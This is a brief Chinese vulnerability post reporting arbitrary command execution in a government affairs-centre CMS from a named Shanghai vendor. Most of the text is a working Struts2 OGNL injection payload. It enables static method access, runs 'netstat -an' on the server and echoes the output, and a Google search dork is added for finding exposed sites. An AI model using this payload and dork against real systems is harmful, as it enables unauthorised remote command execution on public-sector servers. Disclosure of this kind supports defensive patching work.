某政府政务中心CMS存在通用新版任意命令执行
debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),
#f.setAccessible(true),
#f.set(#_memberAccess,true),
#req=@org.apache.struts2.ServletActionContext@getRequest(),
#resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'netstat','-an'})).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[1000],
#d.read(#e),
#resp.println(#e),
#resp.close()
上海天好电子商务有限公司
Google inurl:articleView/articleView!list.action 
